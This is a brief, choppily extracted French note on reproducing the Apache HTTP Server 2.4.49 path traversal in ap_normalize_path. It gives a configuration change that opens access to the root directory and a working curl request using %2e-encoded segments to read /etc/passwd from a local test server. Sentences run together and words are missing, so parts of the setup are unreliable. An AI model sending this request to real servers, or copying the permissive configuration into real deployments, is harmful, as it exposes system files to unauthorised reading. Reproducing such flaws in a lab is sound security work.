
Apache HTTP Server 2.4.49 – Reproduction de la vulnérabilité de traversée de chemin
ap_normalize_path. Un attaquant peut contourner le contrôle d'accès en construisant des requêtes spéciales contenant le codage %2e et lire des fichiers arbitraires sur le serveur Web.Require all denied en Require all granted dans <Directory />/vuln pointant vers /tmp/vuln_dir et définir les permissionscurl -v --path-as-is 'http://127.0.0.1:8080/vuln/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
